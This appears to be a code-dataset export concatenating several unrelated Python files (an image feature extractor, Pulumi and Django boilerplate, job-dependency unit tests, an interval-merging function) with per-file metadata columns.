# latent_mean, latent_stddev = encoder_vgg16(x_input, latent_dim=LATENT_DIM)
# latent_mean, latent_stddev = encoder_vgg19(x_input, latent_dim=LATENT_DIM)
# latent_mean, latent_stddev = encoder_inceptionv1(x_input, latent_dim=LATENT_DIM)
# latent_mean, latent_stddev = encoder_inceptionv4(x_input, latent_dim=LATENT_DIM)
# latent_mean, latent_stddev = encoder_inception_resnetv2(x_input, latent_dim=LATENT_DIM)
# latent_mean, latent_stddev = encoder_resnetv2_152(x_input, latent_dim=LATENT_DIM)#参数过多,训练很慢
with slim.arg_scope(resnet_v2.resnet_arg_scope()):
logits, _ = resnet_v2.resnet_v2_101(x_input, num_classes=None, is_training=False)
init_fn = slim.assign_from_checkpoint_fn(
os.path.join(checkpoints_dir, 'resnet_v2_101.ckpt'),
slim.get_model_variables('resnet_v2_101'))
start_time = time.time()
with tf.Session() as sess:
init_fn(sess)
latent_feature = logits
for i, img_path in enumerate(img_list):
img = utils.img_process_vgg_tf(img_path)
norm_feat = sess.run(latent_feature, feed_dict={x_input: img})
img_name = img_path
# norm_feat = np.hstack((norm_feat,np.zeros([160,],dtype=np.float32)))
feats.append(norm_feat.flatten())
names.append(img_name)
print "extracting feature from image No. %d , %d images in total" % ((i + 1), len(img_list))
end_time = time.time()
print ("final_feature extract time:", (end_time - start_time))
feats = np.array(feats)
print "--------------------------------------------------"
print " writing feature extraction results ..."
print "--------------------------------------------------"
# directory for storing extracted features
output = file_feature_output
h5f = h5py.File(output, 'w')
h5f.create_dataset('dataset_1', data=feats)
h5f.create_dataset('dataset_2', data=names)
h5f.close()
def feature_generator_basenet_vgg(file_img, file_feature_output):
tmp_img_list = []
img_list = []
with open(file_img, 'r') as f:
tmp_img_list = f.readlines()
for item_img in tmp_img_list:
img_list.append(item_img.split(' ')[0])
print "--------------------------------------------------"
print " feature extraction starts"
print "--------------------------------------------------"
feats = []
names = []
# model = DenseNETMAX()
model = VGG16_MODIFIED()
start_time = time.time()
for i, img_path in enumerate(img_list):
norm_feat = model.extract_feat(img_path)
# dct_feat = DCT_binaray(img_path)
# final_feat = np.append(dct_feat, norm_feat)
img_name = img_path
# norm_feat = np.hstack((norm_feat,np.zeros([160,],dtype=np.float32)))
feats.append(norm_feat.flatten())
names.append(img_name)
print "extracting feature from image No. %d , %d images in total" % ((i + 1), len(img_list))
end_time = time.time()
print ("final_feature extract time:", (end_time - start_time))
feats = np.array(feats)
print "--------------------------------------------------"
print " writing feature extraction results ..."
print "--------------------------------------------------"
# directory for storing extracted features
h5f = h5py.File(file_feature_output, 'w')
h5f.create_dataset('dataset_1', data=feats)
h5f.create_dataset('dataset_2', data=names)
h5f.close()
if __name__ == "__main__":
args = {'index_basenet': './result_generator/features/feature_densenet169_trans_imgs_basenet.h5',
'index': '../features/feature_vae_resnetv2_101_trans_imgs_136000_basenet.h5',
'database': '/data/datasets/trans_imgs'}
# feature_generator_densenet(dir_img=args["database"], file_feature_output=args["index"])
# feature_generator_rmac_vgg16(dir_img=args["database"], file_feature_output=args["index"])
# file_ckpt = '/shihuijie/project/densenet/model_new/model_vae_resnetv2_101/vae-136000'
# feature_generator_vae(file_img='/shihuijie/project/vae/data/image_list.txt',
# file_meta_graph=file_ckpt + '.meta',
# file_ckpt=file_ckpt,
# file_feature_output=args["index"])
feature_generator_basenet(file_img='/shihuijie/project/vae/data/image_list.txt',
checkpoints_dir='/shihuijie/project/vae/checkpoints/resnet_v2_101/',
file_feature_output=args["index_basenet"])
# feature_generator_basenet_vgg(file_img='/shihuijie/project/vae/data/image_list.txt',
# file_feature_output=args["index_basenet"])
# feature_generator_densenet(file_img='/shihuijie/project/vae-system/data/image_list.txt',
# file_feature_output=args["index_basenet"])
| 41.170029
| 108
| 0.577628
| 1,742
| 14,286
| 4.46039
| 0.136625
| 0.030631
| 0.037194
| 0.029601
| 0.762806
| 0.722394
| 0.709653
| 0.680309
| 0.671943
| 0.634492
| 0
| 0.017303
| 0.235405
| 14,286
| 346
| 109
| 41.289017
| 0.69404
| 0.181926
| 0
| 0.748936
| 0
| 0
| 0.226017
| 0.119805
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.06383
| null | null | 0.2
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
dfab55c248bbf8d6b41a732aaaca0f2e59e9bb27
| 143
|
py
|
Python
|
transiter/parse/__init__.py
|
jamespfennell/realtimerail
|
352dd7d185d3501d28276476e1390d3288735690
|
[
"MIT"
] | 10
|
2018-10-25T13:07:42.000Z
|
2022-02-08T20:49:07.000Z
|
transiter/parse/__init__.py
|
jamespfennell/realtimerail
|
352dd7d185d3501d28276476e1390d3288735690
|
[
"MIT"
] | 80
|
2019-04-06T23:01:44.000Z
|
2022-02-05T23:35:54.000Z
|
transiter/parse/__init__.py
|
jamespfennell/realtimerail
|
352dd7d185d3501d28276476e1390d3288735690
|
[
"MIT"
] | 3
|
2021-05-07T16:43:39.000Z
|
2021-07-15T18:06:07.000Z
|
from .gtfsrealtime import GtfsRealtimeParser
from .gtfsstatic import GtfsStaticParser
from .parser import TransiterParser
from .types import *
| 28.6
| 44
| 0.853147
| 15
| 143
| 8.133333
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111888
| 143
| 4
| 45
| 35.75
| 0.96063
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
dfabdc6259101f24a9510d57de43fab9ffa7c391
| 46
|
py
|
Python
|
test.py
|
chunkman/mit-python
|
b3fcae2d90fc4dde5866c27cc4e42590bb31e79c
|
[
"MIT"
] | null | null | null |
test.py
|
chunkman/mit-python
|
b3fcae2d90fc4dde5866c27cc4e42590bb31e79c
|
[
"MIT"
] | null | null | null |
test.py
|
chunkman/mit-python
|
b3fcae2d90fc4dde5866c27cc4e42590bb31e79c
|
[
"MIT"
] | null | null | null |
#This is just a test
#Just adding another line
| 23
| 25
| 0.782609
| 9
| 46
| 4
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 46
| 2
| 25
| 23
| 0.947368
| 0.934783
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
dfb1bc503f56cd3573c205c201077e6d8fe70902
| 165
|
py
|
Python
|
watchlist/admin.py
|
Wings30306/yomdb
|
13fa3442bb99856169d5b1c9d0ae1600fa807c19
|
[
"MIT"
] | null | null | null |
watchlist/admin.py
|
Wings30306/yomdb
|
13fa3442bb99856169d5b1c9d0ae1600fa807c19
|
[
"MIT"
] | 19
|
2020-07-11T08:10:50.000Z
|
2021-09-22T19:30:17.000Z
|
watchlist/admin.py
|
Wings30306/yomdb
|
13fa3442bb99856169d5b1c9d0ae1600fa807c19
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Movie, WatchlistItem
# Register your models here.
admin.site.register(Movie)
admin.site.register(WatchlistItem)
| 27.5
| 40
| 0.824242
| 22
| 165
| 6.181818
| 0.545455
| 0.132353
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09697
| 165
| 6
| 41
| 27.5
| 0.912752
| 0.157576
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
5f01002fa23dd54fbb3b80ca923cf9eb10d3c8a4
| 169
|
py
|
Python
|
ngboost/distns/__init__.py
|
kshramt/ngboost
|
693efc3fe40db460c1b3d5e129a8a3356f502864
|
[
"Apache-2.0"
] | null | null | null |
ngboost/distns/__init__.py
|
kshramt/ngboost
|
693efc3fe40db460c1b3d5e129a8a3356f502864
|
[
"Apache-2.0"
] | null | null | null |
ngboost/distns/__init__.py
|
kshramt/ngboost
|
693efc3fe40db460c1b3d5e129a8a3356f502864
|
[
"Apache-2.0"
] | null | null | null |
from .normal import Normal, HomoskedasticNormal
from .laplace import Laplace
from .lognormal import LogNormal, HomoskedasticLogNormal
from .loglaplace import LogLaplace
| 33.8
| 56
| 0.857988
| 18
| 169
| 8.055556
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106509
| 169
| 4
| 57
| 42.25
| 0.960265
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
5f1a73da099ed0a7f3b778e4e9b10103231bb88c
| 2,552
|
py
|
Python
|
sdk/python/pulumi_azure_native/domainregistration/__init__.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/domainregistration/__init__.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/domainregistration/__init__.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from .. import _utilities
import typing
# Export this package's modules as members:
from ._enums import *
from .domain import *
from .domain_ownership_identifier import *
from .get_domain import *
from .get_domain_ownership_identifier import *
from .list_domain_recommendations import *
from .list_top_level_domain_agreements import *
from ._inputs import *
from . import outputs
# Make subpackages available:
if typing.TYPE_CHECKING:
import pulumi_azure_native.domainregistration.v20150401 as __v20150401
v20150401 = __v20150401
import pulumi_azure_native.domainregistration.v20180201 as __v20180201
v20180201 = __v20180201
import pulumi_azure_native.domainregistration.v20190801 as __v20190801
v20190801 = __v20190801
import pulumi_azure_native.domainregistration.v20200601 as __v20200601
v20200601 = __v20200601
import pulumi_azure_native.domainregistration.v20200901 as __v20200901
v20200901 = __v20200901
import pulumi_azure_native.domainregistration.v20201001 as __v20201001
v20201001 = __v20201001
import pulumi_azure_native.domainregistration.v20201201 as __v20201201
v20201201 = __v20201201
import pulumi_azure_native.domainregistration.v20210101 as __v20210101
v20210101 = __v20210101
import pulumi_azure_native.domainregistration.v20210115 as __v20210115
v20210115 = __v20210115
import pulumi_azure_native.domainregistration.v20210201 as __v20210201
v20210201 = __v20210201
else:
v20150401 = _utilities.lazy_import('pulumi_azure_native.domainregistration.v20150401')
v20180201 = _utilities.lazy_import('pulumi_azure_native.domainregistration.v20180201')
v20190801 = _utilities.lazy_import('pulumi_azure_native.domainregistration.v20190801')
v20200601 = _utilities.lazy_import('pulumi_azure_native.domainregistration.v20200601')
v20200901 = _utilities.lazy_import('pulumi_azure_native.domainregistration.v20200901')
v20201001 = _utilities.lazy_import('pulumi_azure_native.domainregistration.v20201001')
v20201201 = _utilities.lazy_import('pulumi_azure_native.domainregistration.v20201201')
v20210101 = _utilities.lazy_import('pulumi_azure_native.domainregistration.v20210101')
v20210115 = _utilities.lazy_import('pulumi_azure_native.domainregistration.v20210115')
v20210201 = _utilities.lazy_import('pulumi_azure_native.domainregistration.v20210201')
| 49.076923
| 90
| 0.816223
| 277
| 2,552
| 7.101083
| 0.245487
| 0.122013
| 0.172852
| 0.233859
| 0.610066
| 0.574479
| 0.27453
| 0
| 0
| 0
| 0
| 0.214636
| 0.121865
| 2,552
| 51
| 91
| 50.039216
| 0.663097
| 0.090517
| 0
| 0
| 1
| 0
| 0.207433
| 0.207433
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.72093
| 0
| 0.72093
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
a024a89b5b2c32486182a24e363a3ee8a1ba3d81
| 4,800
|
py
|
Python
|
tests/unit/dataactcore/test_function_bag.py
|
dael-victoria-reyes/data-act-broker-backend
|
f83c7cad29cac24d95f45a262710dc1564de7dc1
|
[
"CC0-1.0"
] | 1
|
2019-06-22T21:53:16.000Z
|
2019-06-22T21:53:16.000Z
|
tests/unit/dataactcore/test_function_bag.py
|
dael-victoria-reyes/data-act-broker-backend
|
f83c7cad29cac24d95f45a262710dc1564de7dc1
|
[
"CC0-1.0"
] | null | null | null |
tests/unit/dataactcore/test_function_bag.py
|
dael-victoria-reyes/data-act-broker-backend
|
f83c7cad29cac24d95f45a262710dc1564de7dc1
|
[
"CC0-1.0"
] | null | null | null |
import pytest
from unittest.mock import patch
from dataactcore.aws.sqsHandler import SQSMockQueue
from dataactcore.models.jobModels import JobDependency
from dataactcore.models.lookups import JOB_STATUS_DICT, JOB_TYPE_DICT, FILE_TYPE_DICT
from dataactcore.interfaces.function_bag import check_job_dependencies
from tests.unit.dataactcore.factories.job import JobFactory, SubmissionFactory
@pytest.mark.usefixtures("job_constants")
def test_check_job_dependencies_not_finished(database):
""" Tests check_job_dependencies with a job that isn't finished """
sess = database.session
sub = SubmissionFactory(submission_id=1)
job = JobFactory(submission_id=sub.submission_id, job_status_id=JOB_STATUS_DICT['waiting'],
job_type_id=JOB_TYPE_DICT['csv_record_validation'], file_type_id=FILE_TYPE_DICT['award'])
sess.add_all([sub, job])
sess.commit()
with pytest.raises(ValueError):
check_job_dependencies(job.job_id)
@pytest.mark.usefixtures("job_constants")
def test_check_job_dependencies_has_unfinished_dependencies(database):
""" Tests check_job_dependencies with a job that isn't finished """
sess = database.session
sub = SubmissionFactory(submission_id=1)
job = JobFactory(submission_id=sub.submission_id, job_status_id=JOB_STATUS_DICT['finished'],
job_type_id=JOB_TYPE_DICT['csv_record_validation'], file_type_id=FILE_TYPE_DICT['award'],
number_of_errors=0)
job_2 = JobFactory(submission_id=sub.submission_id, job_status_id=JOB_STATUS_DICT['waiting'],
job_type_id=JOB_TYPE_DICT['csv_record_validation'], file_type_id=FILE_TYPE_DICT['award'])
job_3 = JobFactory(submission_id=sub.submission_id, job_status_id=JOB_STATUS_DICT['waiting'],
job_type_id=JOB_TYPE_DICT['csv_record_validation'], file_type_id=FILE_TYPE_DICT['award'],
number_of_errors=0)
sess.add_all([sub, job, job_2, job_3])
sess.commit()
# Job 1 finished, it is a prerequisite for job 2 (waiting)
job_dep = JobDependency(job_id=job_2.job_id, prerequisite_id=job.job_id)
# Job 3 is also a prerequisite of job 2, it's not done, job 2 should stay in "waiting"
job_dep_2 = JobDependency(job_id=job_2.job_id, prerequisite_id=job_3.job_id)
sess.add_all([job_dep, job_dep_2])
sess.commit()
check_job_dependencies(job.job_id)
assert job_2.job_status_id == JOB_STATUS_DICT['waiting']
@pytest.mark.usefixtures("job_constants")
def test_check_job_dependencies_prior_dependency_has_errors(database):
""" Tests check_job_dependencies with a job that is finished but has errors """
sess = database.session
sub = SubmissionFactory(submission_id=1)
job = JobFactory(submission_id=sub.submission_id, job_status_id=JOB_STATUS_DICT['finished'],
job_type_id=JOB_TYPE_DICT['csv_record_validation'], file_type_id=FILE_TYPE_DICT['award'],
number_of_errors=3)
job_2 = JobFactory(submission_id=sub.submission_id, job_status_id=JOB_STATUS_DICT['waiting'],
job_type_id=JOB_TYPE_DICT['csv_record_validation'], file_type_id=FILE_TYPE_DICT['award'])
sess.add_all([sub, job, job_2])
sess.commit()
# Job 1 finished, it is a prerequisite for job 2 (waiting) but it has errors
job_dep = JobDependency(job_id=job_2.job_id, prerequisite_id=job.job_id)
sess.add(job_dep)
sess.commit()
check_job_dependencies(job.job_id)
assert job_2.job_status_id == JOB_STATUS_DICT['waiting']
@patch('dataactcore.interfaces.function_bag.sqs_queue')
@pytest.mark.usefixtures("job_constants")
def test_check_job_dependencies_ready(mock_sqs_queue, database):
""" Tests check_job_dependencies with a job that can be set to ready """
# Mock so it always returns the mock queue for the test
mock_sqs_queue.return_value = SQSMockQueue
sess = database.session
sub = SubmissionFactory(submission_id=1)
job = JobFactory(submission_id=sub.submission_id, job_status_id=JOB_STATUS_DICT['finished'],
job_type_id=JOB_TYPE_DICT['csv_record_validation'], file_type_id=FILE_TYPE_DICT['award'],
number_of_errors=0)
job_2 = JobFactory(submission_id=sub.submission_id, job_status_id=JOB_STATUS_DICT['waiting'],
job_type_id=JOB_TYPE_DICT['csv_record_validation'], file_type_id=FILE_TYPE_DICT['award'])
sess.add_all([sub, job, job_2])
sess.commit()
# Job 1 finished, it is a prerequisite for job 2 (waiting) but it has errors
job_dep = JobDependency(job_id=job_2.job_id, prerequisite_id=job.job_id)
sess.add(job_dep)
sess.commit()
check_job_dependencies(job.job_id)
assert job_2.job_status_id == JOB_STATUS_DICT['ready']
| 47.058824
| 112
| 0.738958
| 706
| 4,800
| 4.654391
| 0.133144
| 0.054778
| 0.063603
| 0.046865
| 0.780889
| 0.780889
| 0.772368
| 0.766281
| 0.766281
| 0.738892
| 0
| 0.008739
| 0.165625
| 4,800
| 101
| 113
| 47.524752
| 0.811735
| 0.126458
| 0
| 0.690141
| 0
| 0
| 0.091979
| 0.051153
| 0
| 0
| 0
| 0
| 0.042254
| 1
| 0.056338
| false
| 0
| 0.098592
| 0
| 0.15493
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
a037fcfc8dd8f8addb4268d02c2c36c9fcd33ad9
| 58
|
py
|
Python
|
___Python/Daniel/2018-06-25-VHS-Bielefeld-Python/p09_isbn/m02_init_example.py
|
uvenil/PythonKurs201806
|
85afa9c9515f5dd8bec0c546f077d8cc39568fe8
|
[
"Apache-2.0"
] | null | null | null |
___Python/Daniel/2018-06-25-VHS-Bielefeld-Python/p09_isbn/m02_init_example.py
|
uvenil/PythonKurs201806
|
85afa9c9515f5dd8bec0c546f077d8cc39568fe8
|
[
"Apache-2.0"
] | null | null | null |
___Python/Daniel/2018-06-25-VHS-Bielefeld-Python/p09_isbn/m02_init_example.py
|
uvenil/PythonKurs201806
|
85afa9c9515f5dd8bec0c546f077d8cc39568fe8
|
[
"Apache-2.0"
] | null | null | null |
from p10_requests import *
print(FOO)
print(math.pi)
| 11.6
| 27
| 0.706897
| 9
| 58
| 4.444444
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.042553
| 0.189655
| 58
| 4
| 28
| 14.5
| 0.808511
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 5
|
a03f2d9b64a8f2fadf13ccde2d3f7162098d158f
| 88
|
py
|
Python
|
core/data_structure/edge.py
|
HuynhThanhQuan/graph-network
|
e429a641e7baecad9765700cac580cfbdedbe1bd
|
[
"MIT"
] | null | null | null |
core/data_structure/edge.py
|
HuynhThanhQuan/graph-network
|
e429a641e7baecad9765700cac580cfbdedbe1bd
|
[
"MIT"
] | 11
|
2020-11-13T18:29:37.000Z
|
2022-02-10T00:25:15.000Z
|
core/data_structure/edge.py
|
HuynhThanhQuan/graph-network
|
e429a641e7baecad9765700cac580cfbdedbe1bd
|
[
"MIT"
] | null | null | null |
class Edge:
pass
class Loop(Edge):
pass
class ParallelEdge(Edge):
pass
| 7.333333
| 25
| 0.625
| 11
| 88
| 5
| 0.454545
| 0.436364
| 0.472727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.295455
| 88
| 11
| 26
| 8
| 0.887097
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
a04fc64fbed860cf0cba109a0bd75fb13d254e98
| 145
|
py
|
Python
|
multiprocessing_talk/__init__.py
|
surfaceowl/python_multiprocessing_talk
|
b71cc924895be2d41b91b1b5b193888e19bba7b5
|
[
"MIT"
] | 3
|
2022-03-17T02:31:50.000Z
|
2022-03-17T23:21:12.000Z
|
multiprocessing_talk/__init__.py
|
surfaceowl/python_multiprocessing_talk
|
b71cc924895be2d41b91b1b5b193888e19bba7b5
|
[
"MIT"
] | null | null | null |
multiprocessing_talk/__init__.py
|
surfaceowl/python_multiprocessing_talk
|
b71cc924895be2d41b91b1b5b193888e19bba7b5
|
[
"MIT"
] | 2
|
2022-03-15T23:16:09.000Z
|
2022-03-17T06:09:16.000Z
|
from .__version__ import application_name, author, version
from .process import main_process, CalculateE, GetDirInfo
from .pool import main_pool
| 36.25
| 58
| 0.841379
| 19
| 145
| 6.052632
| 0.578947
| 0.173913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.110345
| 145
| 3
| 59
| 48.333333
| 0.891473
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
a074768a0b5a466f53ccf135606460e146ae3851
| 78
|
py
|
Python
|
pruebamodelos.py
|
Andresalsu/dashboard_prescriptiva
|
386a586ee0a60aa5567b63eeae2d294a1c1b939c
|
[
"MIT"
] | 1
|
2020-05-20T23:31:47.000Z
|
2020-05-20T23:31:47.000Z
|
pruebamodelos.py
|
Andresalsu/dashboard_prescriptiva
|
386a586ee0a60aa5567b63eeae2d294a1c1b939c
|
[
"MIT"
] | 1
|
2019-11-05T19:20:04.000Z
|
2019-11-05T19:20:04.000Z
|
pruebamodelos.py
|
Andresalsu/dashboard_prescriptiva
|
386a586ee0a60aa5567b63eeae2d294a1c1b939c
|
[
"MIT"
] | 2
|
2019-10-28T21:04:47.000Z
|
2019-11-05T19:56:55.000Z
|
from pruebasistema import buscarTweets
print (buscarTweets('ecaes','','',''))
| 26
| 38
| 0.730769
| 7
| 78
| 8.142857
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 78
| 3
| 39
| 26
| 0.791667
| 0
| 0
| 0
| 0
| 0
| 0.063291
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 5
|
a077bee1662c0ad521f759597f8e644ae38a1678
| 2,905
|
py
|
Python
|
datastructures/arrays/merge_intervals.py
|
sikakente/educative-io-python
|
be6e6c3534bf76e6f77addce16d1ab0c40e3e48d
|
[
"MIT"
] | 1
|
2021-12-28T21:19:53.000Z
|
2021-12-28T21:19:53.000Z
|
datastructures/arrays/merge_intervals.py
|
sikakente/educative-io-python
|
be6e6c3534bf76e6f77addce16d1ab0c40e3e48d
|
[
"MIT"
] | 72
|
2022-02-01T18:18:47.000Z
|
2022-03-13T12:31:26.000Z
|
datastructures/arrays/merge_intervals.py
|
sikakente/educative-io-python
|
be6e6c3534bf76e6f77addce16d1ab0c40e3e48d
|
[
"MIT"
] | null | null | null |
"""
Problem Statement
----------------
Given an arrays of intervals where intervals[i] = [starti, endi],
merge all overlapping intervals, and return an arrays of the non-overlapping intervals
that cover all the intervals in the input.
Input
-----
list of intervals
Output
-------
List of merged intervals
"""
from collections import namedtuple
Interval = namedtuple("Interval", "lower_bound, upper_bound")
def merge_intervals(intervals):
num_intervals = len(intervals)
intervals = list(sorted(intervals))
first_interval_lower_bound, first_interval_upper_bound = intervals[0][0], intervals[0][1]
merged_intervals = [Interval(upper_bound=first_interval_upper_bound, lower_bound=first_interval_lower_bound)]
for i in range(1, num_intervals):
current_lower_bound, current_upper_bound = intervals[i][0], intervals[i][1]
merged_intervals_size = len(merged_intervals)
merged = False
for bound_index in range(merged_intervals_size):
bound = merged_intervals[bound_index]
if bound.lower_bound <= current_lower_bound <= bound.upper_bound or \
bound.lower_bound <= current_upper_bound <= bound.upper_bound:
new_lower_bound = min(current_lower_bound, bound.lower_bound)
new_upper_bound = max(current_upper_bound, bound.upper_bound)
merged_intervals[bound_index] = Interval(lower_bound=new_lower_bound, upper_bound=new_upper_bound)
merged = True
if not merged:
merged_intervals.append(Interval(upper_bound=current_upper_bound, lower_bound=current_lower_bound))
return [[interval.lower_bound, interval.upper_bound] for interval in merged_intervals]
def merge_intervals_faster(intervals):
num_intervals = len(intervals)
intervals = list(sorted(intervals))
first_interval_lower_bound, first_interval_upper_bound = intervals[0][0], intervals[0][1]
merged_intervals = [Interval(upper_bound=first_interval_upper_bound, lower_bound=first_interval_lower_bound)]
for i in range(1, num_intervals):
current_lower_bound, current_upper_bound = intervals[i][0], intervals[i][1]
bound = merged_intervals[-1]
if bound.lower_bound <= current_lower_bound <= bound.upper_bound or \
bound.lower_bound <= current_upper_bound <= bound.upper_bound:
new_lower_bound = min(current_lower_bound, bound.lower_bound)
new_upper_bound = max(current_upper_bound, bound.upper_bound)
merged_intervals[-1] = Interval(lower_bound=new_lower_bound, upper_bound=new_upper_bound)
else:
merged_intervals.append(Interval(upper_bound=current_upper_bound, lower_bound=current_lower_bound))
return [[interval.lower_bound, interval.upper_bound] for interval in merged_intervals]
if __name__ == '__main__':
import doctest
doctest.testmod()
| 42.720588
| 114
| 0.726334
| 373
| 2,905
| 5.294906
| 0.160858
| 0.156962
| 0.091139
| 0.066835
| 0.743291
| 0.723038
| 0.723038
| 0.723038
| 0.723038
| 0.723038
| 0
| 0.006743
| 0.183133
| 2,905
| 67
| 115
| 43.358209
| 0.825537
| 0.104303
| 0
| 0.585366
| 0
| 0
| 0.01542
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04878
| false
| 0
| 0.04878
| 0
| 0.146341
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
a097e99dca2077ae741ff51cfc4a217d7725403a
| 233
|
py
|
Python
|
src/carica/interface/__init__.py
|
Trimatix/carica
|
074be16bdf50541eb3ba92ca42d0ad901cc51bd0
|
[
"Apache-2.0"
] | 5
|
2021-09-08T07:29:23.000Z
|
2021-11-24T00:18:22.000Z
|
src/carica/interface/__init__.py
|
Trimatix/Carica
|
074be16bdf50541eb3ba92ca42d0ad901cc51bd0
|
[
"Apache-2.0"
] | 42
|
2021-09-08T07:31:25.000Z
|
